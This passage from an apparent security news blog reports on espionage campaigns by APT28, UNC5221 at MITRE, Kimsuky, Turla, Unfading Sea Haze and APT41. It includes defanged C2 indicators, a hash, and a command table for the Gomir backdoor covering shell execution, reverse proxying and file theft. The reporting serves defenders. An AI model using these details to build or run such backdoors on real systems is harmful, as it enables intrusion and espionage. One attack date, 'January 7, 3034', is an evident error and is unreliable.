“During this time, Fighting Ursa conducted at least two campaigns with this vulnerability that have been made public. The first occurred between March-December 2022 and the second occurred in March 2023.” reads the report published by the company.

“Unit 42 researchers discovered a third, recently active campaign in which Fighting Ursa also used this vulnerability. The group conducted this most recent campaign between September-October 2023, targeting at least nine organizations in seven nations.”

The researchers pointed out that in the second and third campaigns, the nation-state actor continued to use a publicly known exploit for the Outlook flaw. This implies that the benefits of the access and intelligence produced by these operations were deemed more significant than the potential consequences of being discovered.

The list of targets is very long and includes:

Other than Ukraine, all of the targeted European nations are current members of the North Atlantic Treaty Organization (NATO)
at least one NATO Rapid Deployable Corps
critical infrastructure-related organizations within the following sectors:
1. Energy
2. Transportation
3. Telecommunications
4. Information technology
5. Military industrial base

Microsoft’s Threat Intelligence also warned of Russia-linked cyber-espionage group APT28 actively exploiting the CVE-2023-23397 Outlook flaw to hijack Microsoft Exchange accounts and steal sensitive information.

In October, the French National Agency for the Security of Information Systems ANSSI (Agence Nationale de la sécurité des systèmes d’information) warned that the Russia-linked APT28 group has been targeting multiple French organizations, including government entities, businesses, universities, and research institutes and think tanks.

The French agency noticed that the threat actors used different techniques to avoid detection, including the compromise of monitored low-risk equipment at the target networks’ edge. The Government experts pointed out that in some cases the group did not deploy any backdoor in the compromised systems.

ANSSI observed at least three attack techniques employed by APT28 in the attacks against French organizations:

searching for zero-day vulnerabilities [T1212, T1587.004];
compromise of routers and personal email accounts [T1584.005, T1586.002];
the use of open source tools and online services [T1588.002, T1583.006]. ANSSI investigations confirm that APT28 exploited the Outlook 0-day vulnerability CVE-2023-23397. According to other partners, over this period, the MOA also exploited other vulnerabilities, such as that affecting Microsoft Windows Support Diagnostic Tool (MSDT, CVE-2022-30190, also called Follina) as well as
than those targeting the Roundcube application (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026).

According to the recent announcement published by the German government, the APT28 campaign targeted government authorities, logistics companies, armaments, the air and space industry, IT services, foundations, and associations in Germany, other European countries, and Ukraine. This group was also responsible for the 2015 cyber attack on the German Bundestag. These actions violate international cyber norms and require particular attention, especially during election years in many countries.

The Czech Ministry of Foreign Affairs also condemned long-term cyber espionage activities by the group APT28. The Ministry’s statement also confirmed that Czech institutions have been targeted by the Russia-linked APT28 exploiting the Microsoft Outlook zero-day from 2023

“Based on information from intelligence services, some Czech institutions have also been the target of cyber attacks exploiting a previously unknown vulnerability in Microsoft Outlook from 2023. The mode of operation and the focus of these attacks matched the profile of the actor APT28.” reads the announcement. “Affected subjects were offered technical recommendations and cooperation to enhance security measures. The actor APT28 has also been the subject to active measures in Czechia as part of the global operation Dying Ember.”

NATO issued similar statements, the Council of the European Union and the governments of the United States and the United Kingdom.

“The European Union and its Member States, together with international partners, strongly condemn the malicious cyber campaign conducted by the Russia-controlled Advanced Persistent Threat Actor 28 (APT28) against Germany and Czechia.” states the Council of the European Union.

“Russia’s pattern of behavior blatantly disregards the Framework for Responsible State Behavior in Cyberspace, as affirmed by all United Nations Member States. The United States is committed to the security of our allies and partners and upholding the rules-based international order, including in cyberspace.” reads the statement published by the US government. “We call on Russia to stop this malicious activity and abide by its international commitments and obligations. With the EU and our NATO Allies, we will continue to take action to disrupt Russia’s cyber activities, protect our citizens and foreign partners, and hold malicious actors accountable.”

The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The group was involved also in the string of attacks that targeted 2016 Presidential election.

The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

Most of the APT28s’ campaigns leveraged spear-phishing and malware-based attacks.

MITRE attributes the recent attack to China-linked UNC5221

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

MITRE published more details on the recent security breach, including a timeline of the attack and attribution evidence.

MITRE has shared more details on the recent hack, including the new malware involved in the attack and a timeline of the attacker’s activities.

In April 2024, MITRE disclosed a security breach in one of its research and prototyping networks. The security team at the organization promptly launched an investigation, logged out the threat actor, and engaged third-party forensics Incident Response teams to conduct independent analysis in collaboration with internal experts.

According to the MITRE Corporation, a nation-state actor breached its systems in January 2024 by chaining two Ivanti Connect Secure zero-day vulnerabilities (CVE-2023-46805 and CVE-2024-21887).

MITRE spotted a foreign nation-state threat actor probing its Networked Experimentation, Research, and Virtualization Environment (NERVE), used for research and prototyping. The organization immediately started mitigation actions which included taking NERVE offline. The investigation is still ongoing to determine the extent of information involved.

The organization notified authorities and affected parties and is working to restore operational alternatives for collaboration.

Despite MITRE diligently following industry best practices, implementing vendor recommendations, and complying with government guidance to strengthen, update, and fortify its Ivanti system, they overlooked the lateral movement into their VMware infrastructure.

The organization said that the core enterprise network or partners’ systems were not affected by this incident.

Mitre researchers reported that the indicators of compromise that were observed during the security breach overlap with those Mandiant associated with UNC5221, which is a China-linked APT group.

The state-sponsored hackers first gained initial access to NERVE on December 31, then they deployed the ROOTROT web shell on Internet-facing Ivanti appliances.

On January 4, 2024, the threat actors conducted a reconnaissance on NERVE environment. They accessed vCenter through a compromised Ivanti appliance and communicated with multiple ESXi hosts. The attackers used hijacked credentials to log into several accounts via RDP and accessed user bookmarks and file shares to probe the network.

Then the nation-state actors manipulated VMs to compromise the overall infrastructure.

“The adversary manipulated VMs and established control over the infrastructure. The adversary used compromised administrative credentials, authenticated from an internal NERVE IP address, indicating lateral movement within the NERVE.” reads the update published by Mitre. “They attempted to enable SSH and attempted to destroy one of their own VMs as well as POSTed to /ui/list/export and downloaded a file demonstrating a sophisticated attempt to conceal their presence and maintain persistence within the network.”

On January 7, 3034, the adversary accessed VMs and deployed malicious payloads, including the BRICKSTORM backdoor and a web shell tracked as BEEFLUSH, enabling persistent access and arbitrary command execution.

The hackers relied on SSH manipulation and script execution to maintain control over the compromised systems. Mitre noted attackers exploiting a default VMware account to list drives and generate new VMs, one of which was removed on the same day. BRICKSTORM was discovered in directories with local persistence setups, communicating with designated C2 domains. BEEFLUSH interacted with internal IP addresses, executing dubious scripts and commands from the vCenter server’s /tmp directory

In the following days, the threat actors deployed additional payloads on the target infrastrcuture, including the WIREFIRE (aka GIFTEDVISITOR) web shell, and the BUSHWALK webshell for data exfiltration.

Between mid-February and mid-March, before MITRE discovered the security breach in April, threat actors maintained persistence in the NERVE environment and attempted lateral movement. The organization pointed out that the nation-state actors failed to compromise other resources.

“Despite unsuccessful attempts to pivot to other resources, the adversary persisted in accessing other virtual environments within Center.” concludes the update that includes malware analysis and Indicators of Compromise for the involved payloads. “The adversary executed a ping command for one of MITRE’s corporate domain controllers and attempted to move laterally into MITRE systems but was unsuccessful.”

Russia-linked APT28 targets government Polish institutions

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

CERT Polska warns of a large-scale malware campaign against Polish government institutions conducted by Russia-linked APT28.

CERT Polska and CSIRT MON teams issued a warning about a large-scale malware campaign targeting Polish government institutions, allegedly orchestrated by the Russia-linked APT28 group.

The attribution of the attacks to the Russian APT is based on similarities with TTPs employed by APT28 in attacks against Ukrainian entities.

“the CERT Polska (CSIRT NASK) and CSIRT MON teams observed a large-scale malware campaign targeting Polish government institutions.” reads the alert. “Based on technical indicators and similarity to attacks described in the past (e.g. on Ukrainian entities), the campaign can be associated with the APT28 activity set, which is associated with Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU).”

The threat actors sent emails designed to pique the recipient’s interest and encourage them to click on a link.

Upon clicking on the link, the victims are redirected to the domain run.mocky[.]io, which is a free service used by developers to create and test APIs. The domain, in turn, redirects to another legitimate site named webhook[.]site which allows logging all queries to the generated address and configuring responses.

Threat actors in the wild increasingly rely on popular services in the IT community to evade detection and speed up operations.

The attack chain includes the download of a ZIP archive file from webhook[.]site, which contains:

a Windows calculator with a changed name, e.g. IMG-238279780.jpg.exe, which pretends to be a photo and is used to trick the recipient into clicking on it,
script .bat (hidden file),
fake library WindowsCodecs.dll (hidden file).

If the victim runs the file fake image file, which is a harmless calculator, the DLL file is side-loaded to run the batch file.

The BAT script launches the Microsoft Edge browser and loads a base64-encoded page content to download another batch script from webhook.site. Meanwhile, the browser shows photos of a woman in a swimsuit with links to her genuine social media accounts, aiming to appear credible and lower the recipient’s guard. The downloaded file, initially saved as .jpg, is converted to .cmd and executed.

Finally, the code retrieves the final-stage script that gathers information about the compromised host and sends it back.

“This script constitutes the main loop of the program. In the loop for /l %n in () it first waits for 5 minutes, and then, similarly as before, downloads another script using the Microsoft Edge browser and the reference to webhook.site and executes it. This time, the file with the extension .css is downloaded, then its extension is changed to .cmd and launched.” continues the report. “The script we finally received collects only information about the computer (IP address and list of files in selected folders) on which they were launched, and then send them to the C2 server. Probably computers of the victims selected by the attackers receive a different set of the endpoint scripts.”

The CERT Polska team recommends network administrators to review recent connections to domains like webhook.site and run.mocky.io, as well as their appearance in received emails. These sites are commonly used by programmers, and traffic to them may not indicate infection. If your organization does not utilize these services, it’s suggested to consider blocking these domains on edge devices.

Regardless of whether your organization uses these websites, it’s also advised to filter emails for links to webhook.site and run.mocky.io, as legitimate use of these links in email content is very rare.

Last week, NATO and the European Union condemned cyber espionage operations carried out by the Russia-linked threat actor APT28 (aka “Forest Blizzard”, “Fancybear” or “Strontium”) against European countries.

The Federal Government condemned in the strongest possible terms the long-term espionage campaign conducted by the group APT28 that targeted the Executive Committee of the Social Democratic Party of Germany.

The group operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS).

North Korea-linked Kimsuky APT attack targets victims via Messenger

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

North Korea-linked Kimsuky APT group employs rogue Facebook accounts to target victims via Messenger and deliver malware.

Researchers at Genians Security Center (GSC) identified a new attack strategy by the North Korea-linked Kimsuky APT group and collaborated with the Korea Internet & Security Agency (KISA) for analysis and response. The nation-state actor attack used a fake account posing as a South Korean public official in the North Korean human rights sector. The APT group aimed at connecting with key individuals in North Korean and security-related fields through friend requests and direct messages.

The attack chain starts with the theft of the identity of a real person in South Korea, then the victims were contacted via Facebook Messenger.

Threat actors pretended to share private documents they had written with the victims.

“The initial individual approach is similar to an email-based spear phishing attack strategy. However, the fact that mutual communication and reliability were promoted through Facebook Messenger shows that the boldness of Kimsuky APT attacks is increasing day by day.” reads the report published by GSC. “The Facebook screen used in the actual attack has a background photo that appears to have been taken at a public institution. Threat actors disguised as public officials try to win the favor of their targets by pretending to share private documents they have written.”

The messages included a link to a decoy document hosted on OneDrive. The file is a Microsoft Common Console document that masquerades as an essay or content related to a trilateral summit between Japan, South Korea, and the U.S. One of the decoy documents (‘NZZ_Interview_Kohei Yamamoto.msc’) employed in the attacks was uploaded to the VirusTotal from Japan on April 5, 2024.

The malware had zero detection rate on VT at the upload time.

The experts speculate the APT group was targeting people in Japan and South Korea.

“This is the first time that a suspected attack against Japan was first observed, and then a variant was detected in Korea shortly after.” reads the analysis. “And if you compare the two malicious file execution screens, you can see the same pattern. Although the file name leading to execution is different, both used the name ‘Security Mode’.”

Upon launching the MSC file and allowing it to open it using Microsoft Management Console (MMC), victims are displayed a console screen containing a Word document. If the victims launch it the multi-stage attack chain starts.

The malicious file, named “Console Root task window ‘Security Mode’,” hid certain window styles and tabs. It misled users by labeling a task as “Open” with a description “My_Essay.docx,” making it appear as a document execution screen. Clicking “Open” triggers a malicious command. This command line involves ‘cmd.exe’ with various parameters and attempts to connect to the C2 host ‘brandwizer.co[.]in,’ registered by Whiteserver hosting in India and linked to the IP address ‘5.9.123.217’ in Germany.

The malware maintains persistence by registering a scheduled task named ‘OneDriveUpdate,’ which repeats every 41 minutes indefinitely. This interval is consistent with the timing used in previous Kimsuky group campaigns, such as ‘BabyShark‘ and ‘ReconShark.’

The malware gathered information and exfiltrated it to the C2 server, it can also harvest IP addresses, User-Agent strings, and timestamp information from the HTTP requests. The malware can also drop additional payloads on the infected machines.

“Among the APT attacks reported in Korea in the first quarter of this year, the most representative method is spear phishing attack. In addition, the method of combining shortcut (LNK) type malicious files is steadily becoming popular. Although not commonly reported, covert attacks through social media also occur.” concludes the report.

Turla APT used two new backdoors to infiltrate a European ministry of foreign affairs

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

Russia-linked Turla APT allegedly used two new backdoors, named Lunar malware and LunarMail, to target European government agencies.

ESET researchers discovered two previously unknown backdoors named LunarWeb and LunarMail that were exploited to breach European ministry of foreign affairs.

The two backdoors are designed to carry out a long-term compromise in the target network, data exfiltration, and maintaining control over compromised systems.

The two backdoors compromised a European ministry of foreign affairs (MFA) and its diplomatic missions abroad. The experts speculate the Lunar toolset has been employed since at least 2020. ESET attributes the two backdoors to Russia-linked APT group Turla, with medium confidence.

The Turla APT group (aka Snake, Uroburos, Waterbug, Venomous Bear and KRYPTON) has been active since at least 2004 targeting diplomatic and government organizations and private businesses in the Middle East, Asia, Europe, North and South America, and former Soviet bloc nations.

The exact method of initial access in the compromises observed by ESET is still unclear. However, evidence suggests possible spear-phishing and exploitation of misconfigured Zabbix network and application monitoring software. The researchers noticed a LunarWeb component mimicking Zabbix logs and a backdoor command retrieving Zabbix agent configuration. The experts also spotted spear-phishing messages, including a weaponized Word document installing a LunarMail backdoor.

“LunarWeb, deployed on servers, uses HTTP(S) for its C&C communications and mimics legitimate requests, while LunarMail, deployed on workstations, is persisted as an Outlook add-in and uses email messages for its C&C communications.” reads the report published by ESET.

LunarWeb uses multiple persistence methods, including creating Group Policy extensions, replacing System DLL, and deploying as part of legitimate software.

ESET reported that the execution chain starts with a loader they tracked as LunarLoader. It uses the RC4 symmetric key cipher to decrypt the payloads.

Once the Lunar backdoor has compromised a system, it waits for commands from the C2 server. The cyberspies also used stolen credentials for lateral movement.

LunarWeb can also execute shell and PowerShell commands, gather system information, run Lua code, and exfiltrate data in AES-256 encrypted form.

“Our current investigation began with the detection of a loader decrypting and running a payload, from an external file, on an unidentified server. This led us to the discovery of a previously unknown backdoor, which we named LunarWeb. Subsequently, we detected a similar chain with LunarWeb deployed at a diplomatic institution of a European MFA. Notably, the attacker also included a second backdoor – which we named LunarMail – that uses a different method for command and control (C&C) communications.” continues the report. “During another attack, we observed simultaneous deployments of a chain with LunarWeb at three diplomatic institutions of this MFA in the Middle East, occurring within minutes of each other. The attacker probably had prior access to the domain controller of the MFA and utilized it for lateral movement to machines of related institutions in the same network.”

LunarMail is deployed on workstations with Microsoft Outlook, using an email-based communication system (Outlook Messaging API (MAPI)) to evade detection in environments where HTTPS traffic is monitored. The backdoor communicates with the C2 server via email attachments, often hidden in .PNG images. LunarMail can create processes, take screenshots, write files, and execute Lua scripts, allowing it to run shell and PowerShell commands indirectly.

“We observed varying degrees of sophistication in the compromises; for example, the careful installation on the compromised server to avoid scanning by security software contrasted with coding errors and different coding styles (which are not the scope of this blogpost) in the backdoors. This suggests multiple individuals were likely involved in the development and operation of these tools.” concludes the report. “Although the described compromises are more recent, our findings show that these backdoors evaded detection for a more extended period and have been in use since at least 2020, based on artifacts found in the Lunar toolset.”

North Korea-linked Kimsuky used a new Linux backdoor in recent attacks

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

Symantec warns of a new Linux backdoor used by the North Korea-linked Kimsuky APT in a recent campaign against organizations in South Korea.

Symantec researchers observed the North Korea-linked group Kimsuky using a new Linux backdoor dubbed Gomir. The malware is a version of the GoBear backdoor which was delivered in a recent campaign by Kimsuky via Trojanized software installation packages.

Kimsuky cyberespionage group (aka Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, APT43) was first spotted by Kaspersky researcher in 2013. The APT group mainly targets think tanks and organizations in South Korea, other victims were in the United States, Europe, and Russia.

In 2023 the state-sponsored group focused on nuclear agendas between China and North Korea, relevant to the ongoing war between Russia and Ukraine.

Gomir and GoBear share a great portion of their code.

Researchers from South Korean security firm S2W first uncovered the compaign in February 2024, the threat actors were observed delivering a new malware family named Troll Stealer using Trojanized software installation packages. Troll Stealer supports multiple stealing capabilities, it allows operators to gather files, screenshots, browser data, and system information. The malicious code is written in Go, and researchers noticed that Troll Stealer contained a large amount of code overlap with earlier Kimsuky malware.

Troll Stealer can also copy the GPKI (Government Public Key Infrastructure) folder on infected computers. GPKI is the public key infrastructure schema for South Korean government personnel and state organizations, suggesting that government agencies were among the targeted by state-sponsored hackers.

The malware was distributed inside the installation packages for TrustPKI and NX_PRNMAN, software developed by SGA Solutions. Victims downloaded the packages from a page that was redirected from a specific website.

Symantec also discovered that Troll Stealer was also delivered in Trojanized Installation packages for Wizvera VeraPort.

The WIZVERA VeraPort integration installation program is used to manage additional security software (e.g., browser plug-ins, security software, identity verification software, etc.) that is requested to visit particular government and banking domains. WIZVERA VeraPort is used to digitally sign and verify downloads.

Wizvera VeraPort was previously reported to have been compromised by a supply chain attack conducted by North Korea-linked group Lazarus.

“Troll Stealer appears to be related to another recently discovered Go-based backdoor named GoBear. Both threats are signed with a legitimate certificate issued to “D2innovation Co.,LTD”. GoBear also contains similar function names to an older Springtail backdoor known as BetaSeed, which was written in C++, suggesting that both threats have a common origin.” reads the report published by Symantec.

When executed, the malware checks the group ID value to determine if it is running as group 0 (group is associated with the superuser or administrative privileges) on the Linux machine, and then copies itself to /var/log/syslogd to maintain persistence persistence.

It creates a systemd service named ‘syslogd’ and starts it, then deletes the original executable and terminates the initial process. The backdoor also attempts to configure a crontab command to run on system reboot by creating a helper file (‘cron.txt’) in the current directory. If the crontab list is successfully updated, the malware deletes the helper file without any command-line parameters before executing it.

The Gomir backdoor periodically communicates with its C2 via HTTP POST requests to http://216.189.159[.]34/mir/index.php

The malicious code pools the commands to execute, and the researchers observed it supporting multiple commands. including:

Operation	Description
01	Pauses communication with the C&C server for an arbitrary time duration.
02	Executes an arbitrary string as a shell command (“[shell]” “-c” “[arbitrary_string]”). The shell used is specified by the environment variable “SHELL”, if present. Otherwise, a fallback shell is configured by operation 10 below.
03	Reports the current working directory.
04	Changes the current working directory and reports the working directory’s new pathname.
05	Probes arbitrary network endpoints for TCP connectivity.
06	Terminates its own process. This stops the backdoor.
07	Reports the executable pathname of its own process (the backdoor executable).
08	Collects statistics about an arbitrary directory tree and reports: total number of subdirectories, total number of files, total size of files
09	Reports the configuration details of the affected computer: hostname, username, CPU, RAM, network interfaces, listing each interface name, MAC, IP, and IPv6 address
10	Configures a fallback shell to use when executing the shell command in operation 02. Initial configuration value is “/bin/sh”.
11	Configures a codepage to use when interpreting output from the shell command in operation 02.
12	Pauses communication with the C&C server until an arbitrary datetime.
13	Responds with the message “Not implemented on Linux!” (hardcoded).
14	Starts a reverse proxy by connecting to an arbitrary control endpoint. The communication with the control endpoint is encrypted using the SSL protocol and uses messages consistent with https://github.com/kost/revsocks.git, where the backdoor acts as a proxy client. This allows the remote attacker to initiate connections to arbitrary endpoints on the victim network.
15	Reports the control endpoints of the reverse proxy.
30	Creates an arbitrary file on the affected computer.
31	Exfiltrates an arbitrary file from the affected computer.

Gomir and GoBear Windows backdoor supports almost the same commands.

The latest Kimsuky campaign highlights that North Korean espionage actors increasingly favor software installation packages and updates as infection vectors. The experts noticed a shift to software supply chain attacks through trojanized software installers and fake software installers. A prominent example is the 3CX supply chain attack, stemming from the earlier X_Trader attack.

“This latest Springtail campaign provides further evidence that software installation packages and updates are now among the most favored infection vectors for North Korean espionage actors.” concludes the report. “Springtail, meanwhile, has focused on Trojanized software installers hosted on third-party sites requiring their installation or masquerading as official apps. The software targeted appears to have been carefully chosen to maximize the chances of infecting its intended South Korean-based targets.”

The report also provides indicators of compromise for artifacts employed in the latest campaign, including the Troll Stealer, Gomir, and the GoBear dropper.

Chinese actor ‘Unfading Sea Haze’ remained undetected for five years

Posted on August 12, 2024 - August 12, 2024 by Maq Verma

A previously unknown China-linked threat actor dubbed ‘Unfading Sea Haze’ has been targeting military and government entities since 2018.

Bitdefender researchers discovered a previously unknown China-linked threat actor dubbed ‘Unfading Sea Haze’ that has been targeting military and government entities since 2018. The threat group focuses on entities in countries in the South China Sea, experts noticed TTP overlap with operations attributed to APT41.

Bitdefender identified a troubling trend, attackers repeatedly regained access to compromised systems, highlighting vulnerabilities such as poor credential hygiene and inadequate patching practices.

Unfading Sea Haze remained undetected for over five years, despite extensive artifact cross-referencing and public report analysis, no traces of their prior activities were found.

Unfading Sea Haze’s targets confirms an alignment with Chinese interests. The group utilized various variants of the Gh0st RAT, commonly associated with Chinese actors.

A notable technique involved running JScript code through SharpJSHandler, similar to a feature in the “funnyswitch” backdoor linked to APT41. Both methods involve loading .NET assemblies and executing JScript code, suggesting shared coding practices among Chinese threat actors.

However, these findings indicate a sophisticated threat actor possibly connected to the Chinese cyber landscape.

The researchers cannot determine the initial method used by Unfading Sea Haze to infiltrate victim systems because the initial breach happened over six years ago, making hard to recover forensic evidence.

However, the researchers determined that one of methods used by the threat actors to regaining access to the target organizations are spear-phishing emails. The messages use specially crafted archives containing LNK files disguised as regular documents. When clicked, the LNK files would execute malicious commands. The experts observed multiple spear-phishing attempts between March and May 2023.

Some of the email attachment names used in the attacks are:

SUMMARIZE SPECIAL ORDERS FOR PROMOTIONS CY2023
Data
Doc
Startechup_fINAL

The payload employed in the attacks is a backdoor named SerialPktdoor, however, in March 2024, the researchers observed the threat actors using a new initial access archive files. These archives mimicked the installation process of Microsoft Defender or exploited current US political issues.

The backdoor runs PowerShell scripts and performs operations on files and directories.

“These LNK files execute a PowerShell command line” reads the report. “This is a clever example of a fileless attack that exploits a legitimate tool: MSBuild.exe. MSBuild, short for Microsoft Build Engine, is a powerful tool for automating the software build process on Windows. MSBuild reads a project file, which specifies the location of all source code components, the order of assembly, and any necessary build tools.”

The threat actors maintain persistence through scheduled tasks, in order to avoid detection attackers used task names impersonating legitimate Windows files. The files are combined with DLL sideloading to execute a malicious payload.

Attackers also manipulate local Administrator accounts to maintain persistence, they were spotted enabling the disabled local Administrator account, followed by resetting its password.

Unfading Sea Haze has notably begun using Remote Monitoring and Management (RMM) tools, particularly ITarian RMM, since at least September 2022 to compromise targets’ networks. This approach represents a significant shift from typical nation-state tactics. Additionally, experts collected evidence that they may have established persistence on web servers, such as Windows IIS and Apache httpd, likely using web shells or malicious modules. However, the exact persistence mechanisms remain unclear due to insufficient forensic data.

The Chinese threat actor has developed a sophisticated collection of custom malware and hacking tools. Since at least 2018, they used SilentGh0st, TranslucentGh0st, and three variants of the .NET agent SharpJSHandler supported by Ps2dllLoader. In 2023, they replaced Ps2dllLoader with a new mechanism using msbuild.exe and C# payloads from a remote SMB share. The attackers also replaced fully featured Gh0stRat variants to more modular, plugin-based versions called FluffyGh0st, InsidiousGh0st (available in C++, C#, and Go), and EtherealGh0st.

“One of the payloads delivered by Ps2dllLoader is SharpJSHandler.” reads the report. “SharpJSHandler operates by listening for HTTP requests. Upon receiving a request, it executes the encoded JavaScript code using the Microsoft.JScript library.

Our investigation also uncovered two additional variations that utilize cloud storage services for communication instead of direct HTTP requests. We have found variations for DropBox and for OneDrive. In this case, SharpJSHandler retrieves the payload periodically from a DropBox/OneDrive account, executes it, and uploads the resulting output back to the same location.

These cloud-based communication methods present a potential challenge for detection as they avoid traditional web shell communication channels.”

The threat actors used both custom malware and off-the-shelf tools to gather sensitive data from victim machines.

One of the malware used for data collection is a keylogger called xkeylog, they also used a web browser data stealer, a tool to monitor the presence of portable devices, and a custom tool named DustyExfilTool.

The attackers are also able to target messaging applications like Telegram and Viber. They first terminate the processes for these apps (telegram.exe and viber.exe), then use rar.exe to archive the application data.

“The Unfading Sea Haze threat actor group has demonstrated a sophisticated approach to cyberattacks. Their custom malware arsenal, including the Gh0st RAT family and Ps2dllLoader, showcases a focus on flexibility and evasion techniques.” concludes the report. “The observed shift towards modularity, dynamic elements, and in-memory execution highlights their efforts to bypass traditional security measures. Attackers are constantly adapting their tactics, necessitating a layered security approach.”

APT41: The threat of KeyPlug against Italian industries

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

Tinexta Cyber’s Zlab Malware Team uncovered a backdoor known as KeyPlug employed in attacks against several Italian industries

During an extensive investigation, Tinexta Cyber’s Zlab Malware Team uncovered a backdoor known as KeyPlug, which hit for months a variety of Italian industries. This backdoor is attributed to the arsenal of APT41,a group whose origin is tied to China.

APT41, known also as Amoeba, BARIUM, BRONZE ATLAS, BRONZE EXPORT, Blackfly, Brass Typhoon, Earth Baku, G0044, G0096, Grayfly, HOODOO, LEAD, Red Kelpie, TA415, WICKED PANDA e WICKED SPIDER originated from China (with possible ties to the government), it’s known for its complex campaigns and variety of targeted sectors, their motivation varies from exfiltration of sensible data to financial gain.

The backdoor has been developed to target both Windows and Linux operative systems and using different protocols to communicate which depend on the configuration of the malware sample itself.

Tinexta Cyber’s team has analyzed both variants for Windows and Linux, showing common elements that makes the threat capable of remaining resilient inside attacked systems, nonetheless, implants of perimetral defense were present, such as Firewalls, NIDS and EDR employed on every endpoint.

The first malware sample is an implant attacking the Microsoft Windows operating systems. The infection doesn’t directly start from the implant itself but from another component working as a loader written in the .NET framework. This loader is designed to decrypt another file simulating an icon type file. The decryption is through AES, a well-known symmetric encryption algorithm, with keys stored directly in the sample itself.

Once all decryption operations are completed, the new payload, with SHA256 hash 399bf858d435e26b1487fe5554ff10d85191d81c7ac004d4d9e268c9e042f7bf, can be analyzed. Delving deeper into that malware sample, it is possible to detect a direct correspondence with malware structure with Mandiant’s report “Does This Look Infected? A Summary of APT41 Targeting U.S. State Governments”. In this specific case, the XOR key is 0x59.

The Linux version of the Keyplug malware, however, is slightly more complex and appears to use VMProtect. During static analysis, many strings related to the UPX packer were detected, but the automatic decompression routine did not work. This variant is designed to decode the payload code during execution, and once this is complete, it relaunches using the syscall fork. This method interrupts the analyst’s control flow, making malware analysis more difficult.

Pivoting cyber intelligence information in the cybersecurity community, a potential link has emerged between the APT41 group and the Chinese company I-Soon. On Feb. 16, a large amount of sensitive data from China’s Ministry of Public Security was exposed and then spread on GitHub and Twitter, generating great excitement in the cybersecurity community.

In addition, Hector is a possible RAT (Remote Administration Tool) if not KeyPlug itself, among the arsenal of APT41 uncovered through the I-SOON leak, according to which it can be employed on both Windows and Linux, and uses the WSS protocol. WSS (WebSocket Secure) is a network protocol used to establish a secure WebSocket connection between a client and a server. It is the encrypted version of the WS (WebSocket) protocol and relies on TLS (Transport Layer Security) to provide security, similar to how HTTPS is the secure version of HTTP. However, this type of protocol is not widely adopted by attackers for malware threats, making, therefore, the attribution narrow toward this type of threat.

A connection between the APT41 group and the ISOON data leak incident can be hypothesized. The advanced techniques used and the wide range of sectors targeted coincide with APT41’s typical modus operandi, suggesting a possible connection to this cyber espionage campaign. Deepening the investigation of the ISOON data leak, especially about the tools and methodologies employed, could offer further insight into the involvement of APT41 or similar groups.

“APT41, has always been distinguished by its sophistication and ability to conduct global cyber espionage operations. One of the tools it has used and continues to use is KEYPLUG, a modular backdoor capable of evading major detection systems has offered the attacker the ability to be silent within compromised systems for months.” Luigi Martire, Technical Leader at Tinexta Cyber told Security Affairs.
The risks associated with industrial espionage carried out by groups such as APT41 are significant. Their operations can aim to steal intellectual property, trade secrets, and sensitive information that could confer illicit competitive advantages. Companies operating in technologically advanced or strategic industries are particularly vulnerable, and the consequences of such attacks can include large economic losses, reputational damage, and compromised national security”

Technical details about the attacks and indicators of compromise (Ioc) are included in the report published by Tinexta Cyber.

MITRE December 2023 attack: Threat actors created rogue VMs to evade detection

Posted on August 11, 2024 - August 11, 2024 by Maq Verma

The MITRE Corporation revealed that threat actors behind the December 2023 attacks created rogue virtual machines (VMs) within its environment.

The MITRE Corporation has provided a new update about the December 2023 attack. In April 2024, MITRE disclosed a security breach in one of its research and prototyping networks. The security team at the organization promptly launched an investigation, logged out the threat actor, and engaged third-party forensics Incident Response teams to conduct independent analysis in collaboration with internal experts.

According to the MITRE Corporation, China-linked nation-state actor UNC5221 breached its systems in January 2024 by chaining two Ivanti Connect Secure zero-day vulnerabilities.

MITRE spotted the foreign nation-state threat actor probing its Networked Experimentation, Research, and Virtualization Environment (NERVE), used for research and prototyping. The organization immediately started mitigation actions which included taking NERVE offline. The investigation is still ongoing to determine the extent of information involved.

The organization notified authorities and affected parties and is working to restore operational alternatives for collaboration.

The organization said that the core enterprise network or partners’ systems were not affected by this incident.

According to the new update, threat actors exploited zero-day flaws in Ivanti Connect Secure (ICS) and created rogue virtual machines (VMs) within the organization’s VMware environment.

“The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access. They wrote and deployed a JSP web shell (BEEFLUSH) under the vCenter Server’s Tomcat server to execute a Python-based tunneling tool, facilitating SSH connections between adversary-created VMs and the ESXi hypervisor infrastructure.” reads the latest update. “By deploying rogue VMs, adversaries can evade detection by hiding their activities from centralized management interfaces like vCenter. This allows them to maintain control over compromised systems while minimizing the risk of discovery.”

The attackers deployed rogue virtual machines (VMs) to evade detection by hiding their activities from centralized management interfaces like vCenter. This tactic allows them to control the compromised systems while minimizing the risk of discovery.

The threat actors exploited a default VMware account, VPXUSER, to make API calls for enumerating drives. They bypassed detection by deploying rogue VMs directly onto hypervisors, using SFTP to write files and executing them with /bin/vmx. These operations were invisible to the Center and the ESXi web interface. The rogue VMs included the BRICKSTORM backdoor and persistence mechanisms, configured with dual network interfaces for communication with both the Internet/C2 and core administrative subnets.

“Simply using the hypervisor management interface to manage VMs is often insufficient and can be pointless when it comes to dealing with rogue VMs.” continues the update. “This is because rogue VMs operate outside the standard management processes and do not adhere to established security policies, making them difficult to detect and manage through the GUI alone. Instead, one needs special tools or techniques to identify and mitigate the risks associated with rogue VMs effectively.”

MITRE shared two scripts, Invoke-HiddenVMQuery and VirtualGHOST, that allow admins to identify and mitigate potential threats within the VMware environment. The first script, developed by MITRE, Invoke-HiddenVMQuery is written in PowerShell and serves to detect malicious activities. It scans for anomalous invocations of the /bin/vmx binary within rc.local.d scripts.

